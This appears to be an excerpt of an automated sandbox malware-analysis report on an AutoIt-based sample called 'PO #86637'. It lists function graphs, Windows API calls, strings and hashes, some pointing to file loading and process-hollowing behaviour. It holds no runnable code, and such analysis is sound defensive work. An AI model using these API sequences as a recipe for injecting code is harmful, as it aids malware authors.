40d17ed-40d17f7 1196->1205 1197->1173 1202 40d1907-40d1910 1198->1202 1203 40d1912-40d1918 1198->1203 1201 40d191b 1199->1201 1201->1179 1202->1201 1203->1201 1206 40d17f9-40d1828 call 40d27a8 1205->1206 1207 40d182a-40d183e call 40d25b8 1205->1207 1206->1205 1212 40d1840 1207->1212 1213 40d1842-40d1846 1207->1213 1212->1173 1215 40d1848-40d184c CloseHandle 1213->1215 1216 40d1852-40d1856 1213->1216 1215->1216 1217 40d1858-40d1863 VirtualFree 1216->1217 1218 40d1866-40d186f 1216->1218 1217->1218 1218->1168 1218->1173
                      APIs
                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040D1719
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040D193F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                      • Instruction ID: 072644db9fa251d06bfaf4902a6d423d61ccd6d5f064a12e9b4927126e62b0f5
                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                      • Instruction Fuzzy Hash: C3A10874E00309EBDB14CFA4C998BEEB7B5BF48304F208169E515BB280DB75AA85CF55
                      Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1222 427190-4271ae RegQueryValueExW 1219->1222 1223 40e4eb-40e4f0 1219->1223 1224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1222->1224 1225 42721a-42722a RegCloseKey 1222->1225 1230 427210-427219 call 436508 1224->1230 1231 4271f7-42720e call 402160 1224->1231 1230->1225 1231->1230
                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                      • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: QueryValue$CloseOpen
                      • String ID: Include$Software\AutoIt v3\AutoIt
                      • API String ID: 1586453840-614718249
                      • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                      • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                      • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                      • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                      Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1236 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                      • ShowWindow.USER32(?,00000000), ref: 004105E4
                      • ShowWindow.USER32(?,00000000), ref: 004105EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                      • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                      • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                      • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                      Function 040D1408 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1237 40d1408-40d1544 call 40cf058 call 40d12f8 CreateFileW 1244 40d154b-40d155b 1237->1244 1245 40d1546 1237->1245 1248 40d155d 1244->1248 1249 40d1562-40d157c VirtualAlloc 1244->1249 1246 40d15fb-40d1600 1245->1246 1248->1246 1250 40d157e 1249->1250 1251 40d1580-40d1597 ReadFile 1249->1251 1250->1246 1252 40d1599 1251->1252 1253 40d159b-40d15d5 call 40d1338 call 40d02f8 1251->1253 1252->1246 1258 40d15d7-40d15ec call 40d1388 1253->1258 1259 40d15f1-40d15f9 ExitProcess 1253->1259 1258->1259 1259->1246
                      APIs
                        • Part of subcall function 040D12F8: Sleep.KERNELBASE(000001F4), ref: 040D1309
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040D153A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: SIR3NJ9TQU78AE1L6PI9UQIM6OS
                      • API String ID: 2694422964-1143992182
                      • Opcode ID: 745a28aae594720e7e5946692c295c8fffecb917a18473e737362264b494f918
                      • Instruction ID: 568f8bd8f15026763d3089de152c825bfb02b7f6c8e391475023fe567bd2dc98
                      • Opcode Fuzzy Hash: 745a28aae594720e7e5946692c295c8fffecb917a18473e737362264b494f918
                      • Instruction Fuzzy Hash: ED517430D04388DAEF11DBE4C854BEEBBB4AF15304F044199E6597B2C1DAB91B49CB66
                      Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                      • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                      • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                      • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Close$OpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 1607946009-824357125
                      • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                      • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                      • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                      • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                      Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                      Download Yara Rule
                      APIs
                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                      • _wcsncpy.LIBCMT ref: 004102ED
                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                      • _wcsncpy.LIBCMT ref: 00410340
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                      • String ID:
                      • API String ID: 3170942423-0
                      • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                      • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                      • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                      • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                      Function 040D02F8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 040D0AB3
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040D0B49
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040D0B6B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1701019167.00000000040CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CF000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_40cf000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                      • Instruction ID: 12c2c68880016f1666657088490bb38679cdd4bb25527589bfa00898eacb279c
                      • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                      • Instruction Fuzzy Hash: 0F62EA30A146589BEB24CFA4C850BDEB376EF58304F1091A9D10DFB390E776AE85CB59
                      Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: Error:
                      • API String ID: 4104443479-232661952
                      • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                      • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                      • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                      • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                      Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                      Download Yara Rule
                      APIs
                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                      • String ID: X$pWH
                      • API String ID: 85490731-941433119
                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                      Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                      • _memmove.LIBCMT ref: 00401B57
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                      • String ID: @EXITCODE
                      • API String ID: 2734553683-3436989551
                      • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                      • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                      • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                      • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                      Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                      • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                      Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                      • String ID:
                      • API String ID: 1794320848-0
                      • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                      • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                      Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Process$CurrentTerminate
                      • String ID:
                      • API String ID: 2429186680-0
                      • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                      • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                      Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                      Download Yara Rule
                      APIs
                      • _malloc.LIBCMT ref: 0043214B
                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                      • _malloc.LIBCMT ref: 0043215D
                      • _malloc.LIBCMT ref: 0043216F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _malloc$AllocateHeap
                      • String ID:
                      • API String ID: 680241177-0
                      • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                      • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                      Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                      • _free.LIBCMT ref: 004295A0
                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                      • String ID: >>>AUTOIT SCRIPT<<<
                      • API String ID: 3938964917-2806939583
                      • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                      • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
